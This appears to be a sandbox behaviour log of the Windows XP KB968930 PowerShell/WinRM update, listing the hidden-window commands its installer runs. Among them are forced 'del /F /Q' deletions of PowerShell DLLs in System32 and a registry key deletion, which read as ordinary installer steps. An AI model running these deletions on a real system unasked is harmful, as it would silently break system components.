  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.GPowerShell.resources.dll""' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.WSMan.Management.resources.dll"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Editor.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\System.Management.Automation.resources.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Diagnostics.dll""' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.GraphicalHost.resources.dll"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /wmsettingchange' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Security.resources.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_associative_array.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_associative_array.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_where.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_where.help.txt' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /addenvvariable PATH "<SYSTEM32>\WindowsPowerShell\v1.0"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.GPowerShell.dll"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=m...' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_command_search.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_command_search.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.BackgroundIntelligentTransfer.Management.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.WSMan.Management.resources.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.WSMan.Management.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.WSMan.Runtime.dll""' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Diagnostics.resources.dll""' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.GraphicalHost.dll"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\System.Management.Automation.resources.dll"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Utility.resources.dll"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y "%ALLUSERSPROFILE%\Start Menu\Programs\Windows PowerShell 1.0\Windows PowerShell.lnk" "%WINDIR%\$NtUninstallKB968930$\Windows PowerShell.lnk"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_globbing.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_globbing.help.txt' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Editor.dll"' (with hidden window)
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_alias.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_alias.help.txt' (with hidden window)
  • '<SYSTEM32>\wbem\mofcomp.exe' <SYSTEM32>\winrmprov.mof' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_method.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_method.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c md %WINDIR%\$NtUninstallKB968930$\.' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_escape_character.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_escape_character.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_object.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_object.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_parameter.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_parameter.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_display.xml.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_display.xml.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_operator.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_operator.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_namespace.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_namespace.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_environment_variable.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_environment_variable.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_logical_operator.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_logical_operator.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_._31bf3856ad364e35\Microsoft.PowerShell.Security.resources.dll <SYSTEM32>\WindowsPowerShell\v1.0\.' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.resources\1.0.0.0_._31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll <SYSTEM32>\WindowsPowe...' (with hidden window)
  • '%TEMP%\windowsxp-kb968930-x86-eng.exe' /quiet /norestart' (with hidden window)
  • '<SYSTEM32>\reg.exe' copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration /f' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_flow_control.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_flow_control.help.txt' (with hidden window)
  • '<SYSTEM32>\reg.exe' copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Service HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration\Service /s /f' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll <SYSTEM32>\WindowsPowerShell\v1.0' (with hidden window)
  • '<SYSTEM32>\reg.exe' copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Listener HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration\Listener /s /f' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Security.resources.dll"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll <SYSTEM32>\WindowsPowerShell\v1.0' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_._31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll <SYSTEM32>\WindowsPowerShell\v1.0\.' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_._31bf3856ad364e35\System.Management.Automation.resources.dll <SYSTEM32>\WindowsPowerShell\v1.0\.' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll <SYSTEM32>\WindowsPowerShell\v1.0' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_location.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_location.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll <SYSTEM32>\WindowsPowerShell\v1.0' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll <SYSTEM32>\WindowsPowerShell\v1.0' (with hidden window)
  • '<SYSTEM32>\reg.exe' copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration\Plugin /s /f' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.resources\1.0.0.0_._31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll <SYSTEM32>\WindowsPowerShell...' (with hidden window)
  • '<SYSTEM32>\reg.exe' copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\CertMapping HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration\CertMapping /s /f' (with hidden window)
  • '<SYSTEM32>\reg.exe' copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Client HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration\Client /s /f' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_array.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_array.help.txt' (with hidden window)
  • '<SYSTEM32>\wsmanhttpconfig.exe' downlevelsetup' (with hidden window)
  • '<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration /f' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\System.Management.Automation.dll"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Management.dll"' (with hidden window)
  • '<SYSTEM32>\wsmanhttpconfig.exe' install' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Utility.dll"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Diagnostics.dll"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.WSMan.Runtime.dll"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.WSMan.Management.dll"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.BackgroundIntelligentTransfer.Management.dll"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.ConsoleHost.resources.dll"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Management.resources.dll"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /install "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Security.dll"' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pscustomsetuputil.exe' /addenvvariable PATHEXT ".PSC1"' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\userguide.rtf %WINDIR%\$NtUninstallKB968930$\.\userguide.rtf' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\releasenotes.rtf %WINDIR%\$NtUninstallKB968930$\.\releasenotes.rtf' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_filter.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_filter.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_function.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_function.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_types.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_types.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_shell_variable.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_shell_variable.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_system_state.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_system_state.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_property.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_property.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\quadfold.rtf %WINDIR%\$NtUninstallKB968930$\.\quadfold.rtf' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_wildcard.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_wildcard.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_provider.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_provider.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_pipeline.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_pipeline.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_regular_expression.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_regular_expression.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_script_block.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_script_block.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_scope.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_scope.help.txt' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\gettingstarted.rtf %WINDIR%\$NtUninstallKB968930$\.\gettingstarted.rtf' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\about_execution_environment.help.txt %WINDIR%\$NtUninstallKB968930$\.\about_execution_environment.help.txt' (with hidden window)
  • '%WINDIR%\$968930uinstall_kb968930$\pssetupnativeutils.exe' "<SYSTEM32>\WindowsPowerShell\v1.0\PowerShell.exe" "Accessories\Windows PowerShell\Windows PowerShell.lnk"' (with hidden window)
Executes the following
  • '<SYSTEM32>\regsvr32.exe'
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.BackgroundIntelligentTransfer.Management.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.WSMan.Management.resources.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.WSMan.Management.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.WSMan.Runtime.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Diagnostics.resources.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Diagnostics.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Security.resources.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Security.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Utility.resources.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Utility.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Commands.Management.resources.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Commands.Management.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.ConsoleHost.resources.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\System.Management.Automation.resources.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\System.Management.Automation.dll""
  • '<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Migration /f
  • '<SYSTEM32>\wbem\mofcomp.exe' <SYSTEM32>\winrmprov.mof
  • '<SYSTEM32>\cmd.exe' /c move /y <SYSTEM32>\WindowsPowerShell\v1.0\.\userguide.rtf %WINDIR%\$NtUninstallKB968930$\.\userguide.rtf
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '%WINDIR%\microsoft.net\framework\v2.0.50727\ngen.exe' install /queue:1 /silent /nologo /NoDependencies "Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.GPowerShell.resources.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.GPowerShell.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\.\Microsoft.PowerShell.Editor.resources.dll""
  • '<SYSTEM32>\cmd.exe' /c "del /F /Q "<SYSTEM32>\WindowsPowerShell\v1.0\Microsoft.PowerShell.Editor.dll""
